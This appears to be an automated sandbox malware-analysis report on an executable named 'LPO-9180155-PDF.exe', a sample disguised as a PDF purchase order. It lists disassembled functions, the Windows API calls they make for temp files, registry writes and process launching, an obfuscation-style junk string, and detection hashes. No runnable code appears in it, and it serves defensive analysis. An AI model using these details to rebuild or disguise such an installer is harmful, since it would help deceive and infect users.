Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$PointerWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 539440098-2559241417
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC

Strings

nsa, xrefs: 00405B90
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B
1033, xrefs: 0040334C

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2030658151
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00405BD7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: FileRead
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 2738559852-2559241417
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
